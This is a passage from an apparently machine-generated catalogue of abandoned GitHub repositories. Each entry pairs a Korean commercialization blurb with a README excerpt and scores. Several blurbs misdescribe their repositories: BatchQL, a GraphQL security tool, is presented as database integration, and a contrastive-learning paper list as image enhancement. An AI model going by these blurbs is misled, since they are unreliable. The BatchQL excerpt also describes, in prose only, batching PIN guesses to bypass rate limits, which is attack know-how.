Intro\n\nWelcome Deep Learners!  \n\nThis document provides all the information you need to participate in the RSNA AI Deep Learning Lab. This set of classes provides a hands-on opportunity to engage with deep learning tools, write basic algorithms, learn how to organize data to implement deep learning and improve your understanding of AI technology. \n\nThe classes will be held in the RSNA AI Deep Learning Lab classroom, which is located in the Lakeside Learning Center, Level 3. Here's the schedule of [classes](#class-schedule). CME credit is available for each session.\n\n\n## Requirements\n\nAll lessons are designed to run in Google Colab, which is a free web-based version of Jupyter hosted by Google. You will need a Google account (eg, gmail) to use Colab. If you don't already have a Google account, please create one in advance at the [account sign-up page](https://accounts.google.com/signup/v2/webcreateaccount?flowName=GlifWebSignIn&flowEntry=SignUp). Yo","composite_score":0.502,"license_safety_tag":"safe"},{"name":"densitydesign/raw","github_url":"https://github.com/densitydesign/raw","stars":6,"language":"","license":"Apache-2.0","abandonment_months":37,"description":"# Raw 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터를 아름다운 시각화(그래프, 차트)로 쉽게 변환해주는 도구로, 누구나 전문가처럼 데이터를 표현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 회사 대시보드 제공 플랫폼에 내장하여 고객이 자신의 데이터를 즉시 시각화하도록 제공\n2. **내부 업무 도구**: 마케팅팀이 캠페인 성","readme_excerpt":"![raw header](imgs/raw_header.jpg)\n\n## About\n\n**RAWGraphs** is an open web tool to create custom vector-based visualizations on top of the amazing [d3.js](https://github.com/mbostock/d3) library by [Mike Bostock](http://bost.ocks.org/mike/).\nIt has been developed by [DensityDesign Research Lab](http://www.densitydesign.org/) ([Politecnico di Milano](http://www.polimi.it/)) and [Calibro](http://calib.ro/), and sustained through a corporate stewardship by [ContactLab](http://contactlab.com/it/).\n\nPrimarily conceived as a tool for designers and vis geeks, RAWGraphs aims at providing a missing link  between spreadsheet applications (e.g. Microsoft Excel, Apple Numbers, Google Docs, OpenRefine, …) and vector graphics editors (e.g. Adobe Illustrator, Inkscape, …).\n\nRAWGraphs works with [tabular data](https://en.wikipedia.org/wiki/Table_(information)) (e.g. spreadhseets and comma-separated values) as well as with copied-and-pasted texts from other applications (e.g. Microsoft Excel, TextWrang","composite_score":0.502,"license_safety_tag":"safe"},{"name":"facebookresearch/NeuralDB","github_url":"https://github.com/facebookresearch/NeuralDB","stars":6,"language":"Python","license":"Apache-2.0","abandonment_months":49,"description":"# NeuralDB 분석 보고서\n\n## 왜 보물인가\nFacebook Research에서 만든 이 기술은 일반 데이터베이스처럼 쉽게 사용하면서도 인공지능 수준의 똑똑한 검색과 분석을 가능하게 합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 고객사 데이터를 자동으로 분석해주는 BI(분석) 플랫폼 - 엑셀 데이터를 올리면 자동으로 인사이트를 ","readme_excerpt":"# Database Reasoning over Text\n\nThis repository contains the code for the [Database Reasoning Over Text](https://arxiv.org/pdf/2106.01074.pdf) paper, \nto appear at ACL2021. Work is performed in collaboration with James Thorne, Majid Yazdani, Marzieh Saeidi, Fabrizio Silvestri, Sebastian Riedel, and Alon Halevy.\n\n\n![Overview Image](overview.png)\n\n\n## Data\nThe completed NeuralDB datasets can be downloaded [here](https://dl.fbaipublicfiles.com/neuraldb/fb-data-WikiNLDB.zip) and are released under a [CC BY-SA 3.0 license](https://creativecommons.org/licenses/by-sa/2.0/). \n\nThe dataset includes entity names from Wikidata which are released under a [CC BY-SA 3.0 license](https://creativecommons.org/licenses/by-sa/3.0/).\nThis dataset includes sentences from the KELM corpus. KELM is released under the [CC BY-SA 2.0 license](https://creativecommons.org/licenses/by-sa/2.0/)\n\n\n## Repository Structure\nThe repository is structured in 3 sub-folders:\n\n* Tools for mapping the KELM data to Wikidata ide","composite_score":0.502,"license_safety_tag":"safe"},{"name":"puhaiyang/easyHttpProxy","github_url":"https://github.com/puhaiyang/easyHttpProxy","stars":7,"language":"Java","license":"MIT","abandonment_months":30,"description":"# easyHttpProxy 상용화 분석\n\n## 왜 보물인가\n웹사이트 간 데이터 통신을 중간에서 자동으로 연결해주는 도구로, 기업들이 여러 서비스를 연결할 때 복잡한 작업을 간단하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 여러 회사의 시스템을 한 곳에서 통합 관리하는 통합 플랫폼 제공\n2. **내부 업무 도구**: 회사의 ","readme_excerpt":"# easyHttpProxy\n[![author](https://img.shields.io/badge/author-puhaiyang-brightgreen)](https://github.com/puhaiyang)\n[![blog](https://img.shields.io/badge/blog-csdn-brightgreen)](https://blog.csdn.net/puhaiyang)\n[![License](https://img.shields.io/github/license/puhaiyang/easyHttpProxy)](https://github.com/puhaiyang/easyHttpProxy/blob/master/LICENSE)\n\nsupport http/https proxy.类似于fiddler,由java编写，代码简单便于理解。支持http/https代理！\n\n## 环境\n[![jdk](https://img.shields.io/badge/jdk-1.8%2B-brightgreen)](https://github.com/puhaiyang)\n[![jdk](https://img.shields.io/badge/netty-4.1%2B-brightgreen)](https://github.com/puhaiyang)\n[![jdk](https://img.shields.io/badge/maven-3.0%2B-brightgreen)](https://github.com/puhaiyang)\n- jdk 1.8+\n- maven 3.0+\n- netty 4.1+\n\n## 使用方法\n添加依赖\n```\n<dependency>\n  <groupId>com.github.puhaiyang</groupId>\n  <artifactId>easy-http-proxy</artifactId>\n  <version>0.0.1</version>\n</dependency>\n```\n启动代理服务器：\n> EasyHttpProxyServer.getInstace().start(6667);\n\n## 生成ca根证书\n- 下载openssl工具\n> [https:/","composite_score":0.502,"license_safety_tag":"safe"},{"name":"assetnote/batchql","github_url":"https://github.com/assetnote/batchql","stars":15,"language":"Python","license":"unknown","abandonment_months":42,"description":"# BatchQL 분석 보고서\n\n## 왜 보물인가\n여러 데이터베이스에서 한 번에 정보를 가져올 수 있는 도구로, 복잡한 데이터 작업을 간단하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 고객사들이 자신의 여러 데이터베이스를 통합 관리할 수 있는 대시보드 제공\n2. **내부 업무 도구**: 대기업의 산재된 정보를 한곳에서 조회하","readme_excerpt":"# BatchQL\n\nBatchQL is a GraphQL security auditing script with a focus on performing batch GraphQL queries and mutations. This script is not complex, and we welcome improvements.\n\nWhen exploring the problem space of GraphQL batching attacks, we found that there were a few blog posts on the internet, however no tool to perform GraphQL batching attacks.\n\nGraphQL batching attacks can be quite serious depending on the functionalities implemented. For example, imagine a password reset functionality which expects a 4 digit pin that was sent to your email. With this tool, you could attempt all 10k pin attempts in a single GraphQL query. This may bypass any rate limiting or account lockouts depending on the implementation details of the password reset flow.\n\n# Detections\n\nThis tool is capable of detecting the following:\n\n- Introspection query support\n- Schema suggestions detection\n- Potential CSRF detection\n- Query name based batching\n- Query JSON list based batching\n\n# Attacks\n\nCurrently, this","composite_score":0.502,"license_safety_tag":"unknown"},{"name":"facebookexperimental/reason-native","github_url":"https://github.com/facebookexperimental/reason-native","stars":14,"language":"Reason","license":"MIT","abandonment_months":25,"description":"# reason-native 평가 보고서\n\n## 왜 보물인가\n페이스북이 만든 프로그래밍 언어를 모바일 앱 개발에 쓸 수 있도록 확장한 도구로, 더 안정적이고 버그 적은 앱을 더 빠르게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발사 대상 SaaS**: 모바일 앱 개발 환경 및 협업 플랫폼으로 구독 서비스화\n2. **엔터프라이즈 내부 도구**:","readme_excerpt":"# Reason Native\n\n[![Build Status](https://dev.azure.com/reason-native/reason-native/_apis/build/status/facebookexperimental.reason-native?branchName=master)](https://dev.azure.com/reason-native/reason-native/_build/latest?definitionId=1?branchName=master)\n![Supported Platforms][platforms-badge]\n\nTesting, printing, coloring, and other tools to effectively write native Reason code.\n\n## Packages:\n\n\n[![rely esy package on npm][rely-badge]](https://www.npmjs.com/package/@reason-native/rely)\n[![pastel esy package on npm][pastel-badge]](https://www.npmjs.com/package/@reason-native/pastel)\n[![console esy package on npm][console-badge]](https://www.npmjs.com/package/@reason-native/console)\n[![refmterr esy package on npm][refmterr-badge]](https://www.npmjs.com/package/refmterr)\n\n\n[**`@reason-native/rely`:**](https://reason-native.com/docs/rely/) Native Jest style API.\n\n[**`@reason-native/console`:**](https://reason-native.com/docs/console/quickstart) A web-influenced polymorphic console API for ","composite_score":0.502,"license_safety_tag":"safe"},{"name":"NVIDIA-Merlin/competitions","github_url":"https://github.com/NVIDIA-Merlin/competitions","stars":7,"language":"Jupyter Notebook","license":"unknown","abandonment_months":45,"description":"# NVIDIA-Merlin/competitions 분석\n\n## 왜 보물인가\nNVIDIA의 머신러닝 플랫폼을 활용한 경진대회 자료 모음으로, 실무 데이터 분석 기술을 배우고 검증할 수 있는 실제 사례들이 담겨 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 분석 교육 플랫폼에서 실습 자료와 경진대회 문제 세트 제공\n2. **내부 ","readme_excerpt":"This repository is created to host the Recommender Systems competitions solutions.\n","composite_score":0.502,"license_safety_tag":"unknown"},{"name":"ContrastiveSR/Contrastive_Learning_Papers","github_url":"https://github.com/ContrastiveSR/Contrastive_Learning_Papers","stars":25,"language":"","license":"unknown","abandonment_months":50,"description":"# Contrastive_Learning_Papers 저장소 분석\n\n## 왜 보물인가\n이미지나 영상의 품질을 획기적으로 높이는 AI 기술 논문들을 한곳에 모은 학습 자료로, 기술 개발의 기초가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **사진 편집 SaaS**: 저해상도 사진을 고해상도로 자동 변환하는 온라인 도구 서비스\n2. **보안 카메라 시스","readme_excerpt":"# Contrastive_Learning_Papers\nA list of papers in contrastive learning. \n## Computer Vision\n| Year | Title                                                       | Venue | Code |\n| -----|-------------------------------------------------------------| ----- | ---- |\n| 2021 | [Detco: Unsupervised contrastive learning for object detection](https://arxiv.org/pdf/2102.04803) | arxiv | [Code](https://github.com/xieenze/DetCo) |\n| 2021 | [SEED: Self-supervised Distillation For Visual Representation](https://openreview.net/forum?id=AHm3dbp7D1D) | ICLR | Code |\n| 2021 | [PROTOTYPICAL CONTRASTIVE LEARNING OF UNSUPERVISED REPRESENTATIONS](https://arxiv.org/abs/2005.04966) | ICLR | [Code](https://github.com/salesforce/PCL) |\n| 2021 | [Training GANs with Stronger Augmentations via Contrastive Discriminator](https://openreview.net/forum?id=eo6U4CAwVmg) | ICLR | [Code](https://github.com/jh-jeong/ContraD) |\n| 2021 | [VIEWMAKER NETWORKS: LEARNING VIEWS FOR UNSUPERVISED REPRESENTATION LEARNING](https://a","composite_score":0.502,"license_safety_tag":"unknown"},{"name":"slince/composer-registry-manager","github_url":"https://github.com/slince/composer-registry-manager","stars":5,"language":"PHP","license":"MIT","abandonment_months":39,"description":"# Composer Registry Manager 보물 지도\n\n## 왜 보물인가\n프로그래머들이 필요한 소프트웨어 도구를 한 곳에서 관리할 수 있는 자동화 시스템으로, 반복적인 작업을 줄여주는 효율성 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 소프트웨어 개발사 내부 도구**\n- 여러 프로젝트의 코드 도구들을 중앙에서 통합 관리하는 업무용 플랫폼\n\n**","readme_excerpt":"# CRM - Composer Registry Manager\n\n[![Build Status](https://img.shields.io/github/actions/workflow/status/slince/composer-registry-manager/test.yml?style=flat-square)](https://github.com/slince/composer-registry-manager/actions)\n[![Coverage Status](https://img.shields.io/codecov/c/github/slince/composer-registry-manager.svg?style=flat-square)](https://codecov.io/github/slince/composer-registry-manager)\n[![Total Downloads](https://img.shields.io/packagist/dt/slince/composer-registry-manager.svg?style=flat-square)](https://packagist.org/packages/slince/composer-registry-manager)\n[![Latest Stable Version](https://img.shields.io/packagist/v/slince/composer-registry-manager.svg?style=flat-square&label=stable)](https://packagist.org/packages/slince/composer-registry-manager)\n[![Scrutinizer](https://img.shields.io/scrutinizer/g/slince/composer-registry-manager.svg?style=flat-square)](https://scrutinizer-ci.com/g/slince/composer-registry-manager/?branch=master)\n\nComposer Registry Manager can h","composite_score":0.502,"license_safety_tag":"safe"},{"name":"business-science/free_python_tips","github_url":"https://github.com/business-science/free_python_tips","stars":11,"language":"HTML","license":"unknown","abandonment_months":32,"description":"# business-science/free_python_tips 분석\n\n## 왜 보물인가\n파이썬을 배우는 초보자들이 자주 범하는 실수를 줄이고 효율적인 코딩 습관을 빨리 익힐 수 있는 실용적인 팁 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 SaaS**: 파이썬 초보자용 유료 강좌나 구독 학습 플랫폼에 포함하여 강의 품질 향상\n2. **기업","readme_excerpt":"\n# Tuesday Free Python-Tips Newsletter\n\nYour source for amazing Python-Tips. 👉 [__Sign up here & get the code + tutorial every Tuesday!__](https://learn.business-science.io/python-tips-newsletter)\n\nSet your Python Tips GitHub Repo Up: 👉 [__GitHub Python Tips Setup Video!__](https://youtu.be/e-qQDuswx2I)\n\n[![Tuesday R-Tips](free_python_tips_weekly.jpg)](https://learn.business-science.io/python-tips-newsletter)\n","composite_score":0.502,"license_safety_tag":"unknown"},{"name":"P0cL4bs/Nanobrok","github_url":"https://github.com/P0cL4bs/Nanobrok","stars":20,"language":"CSS","license":"Apache-2.0","abandonment_months":42,"description":"# Nanobrok 저장소 분석\n\n## 왜 보물인가\n작은 규모지만 특정 기술 영역에 집중한 프로젝트로, 틈새 시장에서 필요로 하는 솔루션을 제공할 수 있는 잠재력이 있습니다.\n\n## 어디에 쓸 수 있나\n1. **API 서비스**: 개발자들을 위한 특화된 도구를 클라우드 기반 API로 제공하는 B2B 서비스\n2. **기업 내부 도구**: 금융, 보안, 데이터","readme_excerpt":"# Nanobrok (Web Service)\n\n**Web Service write in Python for control and protect your android device remotely.**\n\n![Nanobrok](/docs/screenshot.png)\n\nThe official app can be found on the PlayStore:\n\n- [NanobrokPro](https://play.google.com/store/apps/details?id=com.mh4x0f.nanobrok)\n- [Nanobrok Community](https://play.google.com/store/apps/details?id=com.mh4x0f.community.nanobrok)\n\n## Overview\n**Nanobrok-Server** is powerful opensource webservice for control and protect your android device, written in Python, that allow and offer a stable and security connection with your android device for protect , control remotely.\n\n## Main Features\n\n- Maps the location of your device\n- Alert flag (Event it's lost or stolen)\n- Recorder Audio Mic \n- Remote File Transfer [PRO]\n- Network scanner [PRO]\n- and **more**!\n\n## Security features\n\nWe implemented some security features for try protect your remote server. But remember that no method of transmission over the internet, or method of electronic storage ","composite_score":0.5019,"license_safety_tag":"safe"},{"name":"hwwang55/KGNN-LS","github_url":"https://github.com/hwwang55/KGNN-LS","stars":7,"language":"Python","license":"MIT","abandonment_months":79,"description":"# KGNN-LS 상용화 분석\n\n## 왜 보물인가\n복잡한 데이터 관계를 자동으로 학습하는 AI 기술로, 추천 시스템이나 검색 엔진의 정확도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 추천 서비스**: 고객이 다음에 살 물건을 정확히 예측하는 SaaS로 온라인 쇼핑몰에 판매\n2. **내부 콘텐츠 추천 도구**: 대형 미디어사·방","readme_excerpt":"# KGNN-LS\n\nThis repository is the implementation of KGNN-LS ([arXiv](http://arxiv.org/abs/1905.04413)):\n\n> Knowledge-aware Graph Neural Networks with Label Smoothness Regularization for Recommender Systems\nHongwei Wang, Fuzheng Zhang, Mengdi Zhang, Jure Leskovec, Miao Zhao, Wenjie Li, Zhongyuan Wang.  \nIn Proceedings of The 25th ACM SIGKDD Conference on Knowledge Discovery and Data Mining (KDD 2019)\n\n![](https://github.com/hwwang55/KGNN-LS/blob/master/framework.png)\n\nKGNN-LS applies the technique of graph neural networks (GNNs) to proces knowledge graphs for the purpose of recommendation.\nThe model is enhanced by adding a label smoothness regularizer for more powerful and adaptive learning.\n\n\n### Files in the folder\n\n- `data/`\n  - `movie/`\n    - `item_index2entity_id.txt`: the mapping from item indices in the raw rating file to entity IDs in the KG;\n    - `kg.txt`: knowledge graph file;\n  - `music/`\n    - `item_index2entity_id.txt`: the mapping from item indices in the raw rating file ","composite_score":0.5019,"license_safety_tag":"safe"},{"name":"facebookexperimental/skybison","github_url":"https://github.com/facebookexperimental/skybison","stars":51,"language":"C++","license":"NOASSERTION","abandonment_months":42,"description":"# Skybison 저장소 분석\n\n## 왜 보물인가\n페이스북(메타)이 만든 실험 프로젝트로, 새로운 프로그래밍 언어나 개발 도구를 탐색하는 혁신적인 기술이 담겨 있을 가능성이 높습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 플랫폼**: 새로운 프로그래밍 학습 강좌나 코드 실습 환경으로 제공\n2. **기업용 코드 생성 도구**: 회사 내부의 반복적","readme_excerpt":"# Welcome to Skybison!\n\n## A note on development\n\n**Development has moved to [tekknolagi/skybison](https://github.com/tekknolagi/skybison)**\n\n## What is Skybison?\n\nSkybison is experimental performance-oriented greenfield implementation of\nPython 3.8. It contains a number of performance optimizations, including: small\nobjects; a moving GC; hidden classes; bytecode inline caching; type-specialized\nbytecode; an experimental template JIT.\n\n## Is this supported?\n\nNo.\n\nEven though the project is no longer under active development internally, we've\nmade Skybison publicly available in the hopes that people might find its\nhistory and internals interesting, or maybe even useful. It has not been\npolished or documented for anyone else's use.\n\nWe cannot commit to fixing external bug reports or reviewing pull requests.\nThat said, if you have experience in dynamic language runtimes and have ideas\nto make Skybison faster; or if you work on CPython and want to use Skybison as\ninspiration for improvemen","composite_score":0.5019,"license_safety_tag":"unknown"},{"name":"jcs/bitwarden-ruby","github_url":"https://github.com/jcs/bitwarden-ruby","stars":5,"language":"Ruby","license":"ISC","abandonment_months":42,"description":"# jcs/bitwarden-ruby 분석\n\n## 왜 보물인가\n비트워든(유명한 암호 관리 서비스)을 루비 프로그래밍 언어로 쉽게 연결할 수 있는 도구로, 기업의 암호 보안 관리를 자동화하는 데 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 직원 계정 관리가 필요한 협업 도구에서 자동으로 비트워든과 연동하여 암호 보안 강화\n- ","readme_excerpt":"**This project is no longer being maintained.  Please see\n[this issue](https://github.com/jcs/rubywarden/issues/122)\nfor further information.**\n\nThis project is not associated with the\n[Bitwarden](https://bitwarden.com/)\nproject nor 8bit Solutions LLC.\nDo not contact Bitwarden for support with using this backend server\n(or at the very least, make it abundantly clear that you are using a 3rd party backend server).\n\n## Rubywarden\n\nA small, self-contained API server written in Ruby and Sinatra to provide a\nprivate backend for the open-source\n[Bitwarden apps](https://github.com/bitwarden).\n\n### Data\n\nAll data is stored in a local SQLite database.\nThis means you can easily run the server locally and have your data never\nleave your device, or run it on your own web server via Rack and some front-end\nHTTP server with TLS to support syncing across multiple devices.\nBacking up your data is as easy as copying the `db/production/production.sqlite3`\nfile somewhere.\n\nAll user data in the SQLite dat","composite_score":0.5019,"license_safety_tag":"safe"},{"name":"fossasia/pslab-remote","github_url":"https://github.com/fossasia/pslab-remote","stars":12,"language":"JavaScript","license":"Apache-2.0","abandonment_months":42,"description":"# pslab-remote 상용화 분석\n\n## 왜 보물인가\n어디서나 원격으로 물리 실험 장비를 제어하고 데이터를 수집할 수 있는 플랫폼으로, 원격 교육과 연구에 새로운 가능성을 열어줍니다.\n\n## 어디에 쓸 수 있나\n1. **원격 과학 교육 SaaS**: 학생들이 자신의 집에서 학교 실험실의 측정 장비에 접속하여 물리/화학 실험을 진행하는 온라인 교육 플랫","readme_excerpt":"# PSLab Webapp\n\nThis repository holds the code for the PSLab Webapp to enable students to access the [Pocket Science Lab (PSLab)](https://pslab.io) open hardware platform and other equipment through the Internet.\n\n[![Build Status](https://travis-ci.org/fossasia/pslab-webapp.svg?branch=master)](https://travis-ci.org/fossasia/pslab-webapp)\n[![Mailing List](https://img.shields.io/badge/Mailing%20List-FOSSASIA-blue.svg)](https://groups.google.com/forum/#!forum/pslab-fossasia)\n[![Gitter](https://badges.gitter.im/fossasia/pslab.svg)](https://gitter.im/fossasia/pslab?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n[![Twitter Follow](https://img.shields.io/twitter/follow/pslabio.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://twitter.com/pslabio)\n\nThe goal of the PSLab Webapp is to create a virtual lab that can give students remote access to Pocket Science Labs and other equipment in laboratories via the internet without having to be physically present near th","composite_score":0.5019,"license_safety_tag":"safe"},{"name":"jesseduffield/lazynpm","github_url":"https://github.com/jesseduffield/lazynpm","stars":17,"language":"Go","license":"MIT","abandonment_months":39,"description":"# lazynpm 상용화 분석\n\n## 왜 보물인가\n패키지 관리 작업을 자동화하여 개발자들이 반복적인 명령어 입력 대신 간단한 메뉴 선택만으로 필요한 작업을 처리할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 웹 기반 개발 환경(클라우드 IDE)에 통합하여 개발자들이 패키지 관리를 GUI로 편하게 할 수 있는 기능 제공\n\n*","readme_excerpt":"# lazynpm\n\n![CI](https://github.com/jesseduffield/lazynpm/workflows/Continuous%20Integration/badge.svg) [![Go Report Card](https://goreportcard.com/badge/github.com/jesseduffield/lazynpm)](https://goreportcard.com/report/github.com/jesseduffield/lazynpm) [![GolangCI](https://golangci.com/badges/github.com/jesseduffield/lazynpm.svg)](https://golangci.com) [![GoDoc](https://godoc.org/github.com/jesseduffield/lazynpm?status.svg)](http://godoc.org/github.com/jesseduffield/lazynpm) [![GitHub tag](https://img.shields.io/github/tag/jesseduffield/lazynpm.svg)]() [![TODOs](https://badgen.net/https/api.tickgit.com/badgen/github.com/jesseduffield/lazynpm)](https://www.tickgit.com/browse?repo=github.com/jesseduffield/lazynpm)\n\nA simple terminal UI for npm commands, written in Go with the [gocui](https://github.com/jroimartin/gocui \"gocui\") library.\n\nnpm is pretty cool, but some of its workflows are a little too much for somebody with my atrocious short term memory. If I need to link a couple of de","composite_score":0.5019,"license_safety_tag":"safe"},{"name":"kiki7000/discord.py-components","github_url":"https://github.com/kiki7000/discord.py-components","stars":11,"language":"Python","license":"MIT","abandonment_months":56,"description":"# discord.py-components 평가 보고서\n\n## 왜 보물인가\n디스코드(게임/커뮤니티 플랫폼) 채팅창에서 버튼, 메뉴 등 상호작용 요소를 쉽게 만들 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 디스코드 기반 커뮤니티 관리 플랫폼에서 자동 승인/거절 버튼 시스템 제공\n2. **내부 업무 도구**: 게임 길","readme_excerpt":"<div align=\"center\">\n    <a href=\"https://pypi.org/project/discord-components\"><img src=\"https://raw.githubusercontent.com/kiki7000/discord.py-components/master/.github/logo.png\" alt=\"discord-components logo\" height=\"128\" style=\"border-radius: 50%\"></a>\n    <h1>discord-components</h1>\n</div>\n<div align=\"center\">\n        <a href=\"https://travis-ci.com/kiki7000/discord.py-components\"><img src=\"https://travis-ci.com/kiki7000/discord.py-components.svg?branch=master\" alt=\"Build Status\"></a>\n        <a href=\"https://pypi.org/project/discord-components\"><img src=\"https://badge.fury.io/py/discord-components.svg\" alt=\"PyPI version\"></a>\n        <a href=\"https://pypi.org/project/discord-components\"><img src=\"https://img.shields.io/pypi/dm/discord-components\" alt=\"PyPI downloads\"></a>\n</div>\n<p align=\"center\">\n    <h3>An unofficial third party library of discord.py for discord components.</h3>\n</p>\n\n## Welcome!\n\nDiscord components are cool, but discord.py will support it on version 2.0. It\nis har","composite_score":0.5019,"license_safety_tag":"safe"},{"name":"kubemq-io/kubemq-community","github_url":"https://github.com/kubemq-io/kubemq-community","stars":5,"language":"Go","license":"Apache-2.0","abandonment_months":40,"description":"# KubeMQ Community 분석\n\n## 왜 보물인가\n여러 애플리케이션이 서로 안정적으로 메시지를 주고받을 수 있도록 돕는 기반 기술로, 현대적인 디지털 시스템의 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 전자상거래 플랫폼에서 주문, 결제, 배송 알림을 실시간으로 처리하는 메시지 전달 시스템\n- **내부 업무 도구**:","readme_excerpt":"![Docker](https://github.com/kubemq-io/kubemq-community/actions/workflows/docker-image.yml/badge.svg) ![goreleaser](https://github.com/kubemq-io/kubemq-community/actions/workflows/goreleaser.yml/badge.svg) ![Go Report Card](https://goreportcard.com/badge/github.com/kubemq-io/kubemq-community)\n# What is KubeMQ Community?\n\nKubeMQ Community is the open-source version of KubeMQ, the Kubernetes native message broker.\n[More about KubeMQ](https://kubemq.io/)\n\n# New\n\n## KubeMQ Web Interface\n\nBrowse to [http://localhost:8080/](http://localhost:8080/) after installation and use the KubeMQ Web Interface to manage KubeMQ broker instance.\n\n\n![](https://github.com/kubemq-io/kubemq-community/blob/7ae66097831b1c21121cea706d7f9112b77b74d8/images/dashboard.png \"KubeMQ Dashboard\")\n\n\n\n# Installation\n\n## Docker\n\nPull and run KubeMQ standalone docker container:\n\n``` bash  \ndocker run -d -p 8080:8080 -p 50000:50000 -p 9090:9090 kubemq/kubemq-community:latest  \n```  \n\n## Binaries\n\n1. Download the latest versi","composite_score":0.5019,"license_safety_tag":"safe"},{"name":"Go1c/AboutGameEngineGraphics","github_url":"https://github.com/Go1c/AboutGameEngineGraphics","stars":13,"language":"","license":"MIT","abandonment_months":68,"description":"# Go1c/AboutGameEngineGraphics 분석\n\n## 왜 보물인가\n게임과 영상 제작에 필수적인 그래픽 기술의 원리를 쉽게 설명하는 교육 자료로, 관심 있는 사람들이 기초부터 배울 수 있는 귀한 학습 자원입니다.\n\n## 어디에 쓸 수 있나\n- **게임 개발 온라인 교육 플랫폼**: 초보자를 위한 그래픽 기초 강좌를 구독 형태로 판매\n- **게임","readme_excerpt":"## 主要是个人收集的一些游戏相关的渲染知识和白嫖圣地\n=========================================\n### 知乎专栏 https://www.zhihu.com/column/-Go1c\n=========================================\n### 大佬的blog\n\n### 国内\n\n[冯乐乐大佬](https://blog.csdn.net/candycat1992/article/details/44039077)\n\n[FishMan的技术专栏](https://jiepengtan.github.io/)\n\n[中级Shader教程17 海洋渲染 - JiepengTan‘s blog专栏 - CSDN博客](https://blog.csdn.net/tjw02241035621611/article/details/80106327)\n\n[Luffy Blog](https://luumoon.github.io/)\n\n[浅墨](https://github.com/QianMo/Awesome-Unity-Shader#4%E8%87%AA%E5%AE%9A%E4%B9%89%E5%8D%A1%E9%80%9A%E6%B8%90%E5%8F%98%E5%85%89%E7%85%A7)\n\n[Unity Blog - A glimpse inside Unity Technologies…](https://blogs.unity3d.com/)\n\n[Graphic Debugger工具大杂烩，你要的都在这 - 知乎](https://zhuanlan.zhihu.com/p/70780719)\n\n[算法库](https://courses.csail.mit.edu/6.851/)\n\n[《塞尔达-荒野之息》中角色受多个点光源影响的做法 – WalkingFat](http://walkingfat.com/%E3%80%8A%E5%A1%9E%E5%B0%94%E8%BE%BE-%E8%8D%92%E9%87%8E%E4%B9%8B%E6%81%AF%E3%80%8B%E4%B8%AD%E8%A7%92%E8%89%B2%E5%8F%97%E5%A4%9A%E4%B8%AA%E7%82%B9","composite_score":0.5019,"license_safety_tag":"safe"},{"name":"dokugaku-engineer/dokugaku-engineer","github_url":"https://github.com/dokugaku-engineer/dokugaku-engineer","stars":38,"language":"Vue","license":"unknown","abandonment_months":27,"description":"# dokugaku-engineer 평가 보고서\n\n## 왜 보물인가\n프로그래밍을 독학하는 사람들을 위한 체계적인 학습 자료와 커뮤니티가 담긴 저장소로, 코딩 입문자들이 헤매지 않도록 길을 안내해주는 지도 같은 역할을 합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 독학 프로그래머용 구독형 학습 플랫폼 (월간 강의, 커뮤니티 토론방 제공)\n","readme_excerpt":"<p align=\"center\"><img src=\"https://raw.githubusercontent.com/dokugaku-engineer/dokugaku-engineer/images/logo_long.png\"></p>\n\n<p align=\"center\">\n<a href=\"https://github.styleci.io/repos/269288112?branch=master\"><img src=\"https://github.styleci.io/repos/269288112/shield?branch=master\" alt=\"StyleCI\"></a>\n<a href=\"https://codebuild.ap-northeast-1.amazonaws.com/badges?uuid=eyJlbmNyeXB0ZWREYXRhIjoiUU80N3IraHgxOFVnKzVlZ2h1Q3Z3QkZBalA0Q0lJakVtUmVsK2J3ZCtMSFRHdUgySlZSaFAvZnBuTk50QWhSR2F2TUgzUU5wNFIzQUplTTJRM1VGRUwwPSIsIml2UGFyYW1ldGVyU3BlYyI6InpyVUN4WFZnZTE2TndmZjYiLCJtYXRlcmlhbFNldFNlcmlhbCI6MX0%3D&branch=master\"><img src=\"https://codebuild.ap-northeast-1.amazonaws.com/badges?uuid=eyJlbmNyeXB0ZWREYXRhIjoiUU80N3IraHgxOFVnKzVlZ2h1Q3Z3QkZBalA0Q0lJakVtUmVsK2J3ZCtMSFRHdUgySlZSaFAvZnBuTk50QWhSR2F2TUgzUU5wNFIzQUplTTJRM1VGRUwwPSIsIml2UGFyYW1ldGVyU3BlYyI6InpyVUN4WFZnZTE2TndmZjYiLCJtYXRlcmlhbFNldFNlcmlhbCI6MX0%3D&branch=master\" alt=\"Client CI\"></a>\n<a href=\"https://codebuild.ap-northeast-1.amazonaws.co","composite_score":0.5019,"license_safety_tag":"unknown"},{"name":"ASoulCnki/ASoulCnki","github_url":"https://github.com/ASoulCnki/ASoulCnki","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":49,"description":"# ASoulCnki 저장소 분석\n\n## 왜 보물인가\nA-Soul이라는 버추얼 크리에이터 그룹의 팬덤 데이터를 체계적으로 정리한 자료로, 팬 커뮤니티 분석과 창작 콘텐츠 제작에 활용할 수 있는 고유한 정보 집합입니다.\n\n## 어디에 쓸 수 있나\n\n1. **팬덤 분석 서비스**: 버추얼 크리에이터 팬클럽을 위한 통계 대시보드나 팬 커뮤니티 관리 플랫폼\n2. ","readme_excerpt":"# A-SOUL评论区小作文 枝网查重系统\n\n网站地址：https://asoulcnki.asia\n\n项目首页：https://github.com/ASoulCnki\n\n项目后端（基于spring 